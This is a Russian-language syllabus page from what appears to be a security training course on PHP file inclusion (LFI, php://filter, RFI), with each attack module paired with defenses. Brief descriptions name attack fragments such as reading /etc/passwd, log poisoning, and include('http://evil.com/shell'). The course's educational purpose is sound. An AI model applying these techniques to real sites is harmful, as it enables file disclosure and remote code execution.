Все пути
Путь php 5 модулей

PHP File Inclusion: LFI, php://filter и RFI

Углублённый курс по уязвимостям включения файлов в PHP. Изучите механику include/require, Local File Inclusion, чтение исходного кода через php://filter, Remote File Inclusion и PHP stream wrappers.

01

Модуль 1: Введение в File Inclusion в PHP

include/require, allow_url_include, PHP stream wrappers (php://, data://, expect://).

0/3
  • 1. File Inclusion в PHP: include, require и stream wrappers
    Pro
  • 2. Обзор методов защиты
    Pro
  • 3. Тест: Введение в File Inclusion
    Pro
02

Модуль 2: Basic LFI

include($_GET['page']), /etc/passwd, log poisoning, защита через whitelist.

0/4
  • 1. Local File Inclusion: чтение системных файлов
    Pro
  • 2. Защита: whitelist допустимых страниц
    Pro
  • 3. Тест: Basic LFI
    Pro
  • EXP FIX
    4. Практика: Local File Inclusion
    easy
    Pro
03

Модуль 3: php://filter

php://filter/convert.base64-encode для чтения исходного кода, php://input для инъекции.

0/4
  • 1. php://filter: чтение исходного кода и code injection
    Pro
  • 2. Защита: basename() + hardcoded page map
    Pro
  • 3. Тест: php://filter
    Pro
  • EXP FIX
    4. Практика: php://filter
    medium
    Pro
04

Модуль 4: Remote File Inclusion (RFI)

include('http://evil.com/shell'), allow_url_include=On, защита через allow_url_include=Off.

0/5
  • 1. Remote File Inclusion: выполнение кода с удалённого сервера
    Pro
  • 2. Защита: allow_url_include=Off и строгие локальные пути
    Pro
  • 3. Defense-in-Depth: многослойная защита
    Pro
  • 4. Тест: RFI
    Pro
  • EXP FIX
    5. Практика: Remote File Inclusion
    hard
    Pro
05

Модуль 5: Итоговый обзор

PHP wrapper cheatsheet, open_basedir, реальные CVE, чеклист.

0/3
  • 1. Итоговый обзор: File Inclusion в PHP
    Pro
  • 2. Автоматизация обнаружения: SAST и DAST
    Pro
  • 3. Финальный тест: File Inclusion
    Pro
🚧 Сайт в разработке. Полный функционал пока недоступен. Все вопросы — support@hackandfix.ru